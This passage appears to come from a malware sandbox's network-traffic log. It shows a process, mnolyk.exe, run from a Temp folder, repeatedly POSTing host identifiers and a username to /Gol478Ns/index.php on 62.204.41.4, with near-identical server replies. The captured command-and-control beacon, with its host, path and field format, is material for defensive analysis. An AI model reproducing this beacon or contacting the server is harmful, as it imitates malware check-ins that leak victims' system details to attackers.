                                                        Feb 6, 2023 14:16:30.576133013 CET | 208 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.639316082 CET | 209 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        80 | 192.168.2.5 | 49770 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:03.784821033 CET | 281 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:03.849550009 CET | 281 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        81 | 192.168.2.5 | 49771 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:04.019413948 CET | 282 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.084112883 CET | 282 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        82 | 192.168.2.5 | 49772 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:04.254513979 CET | 283 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.319797039 CET | 283 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        83 | 192.168.2.5 | 49773 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:04.487845898 CET | 284 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.551690102 CET | 284 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        84 | 192.168.2.5 | 49774 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:04.719767094 CET | 285 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:04.784183979 CET | 285 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        85 | 192.168.2.5 | 49775 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:04.965034008 CET | 286 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.031927109 CET | 286 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        86 | 192.168.2.5 | 49776 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:05.213337898 CET | 287 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.276880980 CET | 287 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        87 | 192.168.2.5 | 49777 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:05.460295916 CET | 288 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.525388002 CET | 288 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        88 | 192.168.2.5 | 49778 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:05.707869053 CET | 289 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:05.772675037 CET | 289 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        89 | 192.168.2.5 | 49779 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:05.941637993 CET | 290 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.007407904 CET | 290 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        9 | 192.168.2.5 | 49699 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:30.811357975 CET | 209 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:30.874645948 CET | 210 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:30 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        90 | 192.168.2.5 | 49780 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:06.175417900 CET | 291 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.244282007 CET | 291 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        91 | 192.168.2.5 | 49781 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:06.429229975 CET | 292 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.494554043 CET | 292 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        92 | 192.168.2.5 | 49782 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:06.679140091 CET | 293 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.743294001 CET | 293 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        93 | 192.168.2.5 | 49783 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:06.930392027 CET | 294 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:06.997920990 CET | 294 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        94 | 192.168.2.5 | 49784 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:07.177697897 CET | 295 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.251141071 CET | 295 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        95 | 192.168.2.5 | 49785 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:07.425626040 CET | 296 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.490989923 CET | 296 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        96 | 192.168.2.5 | 49786 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:07.678071022 CET | 297 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:07.741566896 CET | 297 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        97 | 192.168.2.5 | 49787 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:07.919083118 CET | 298 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
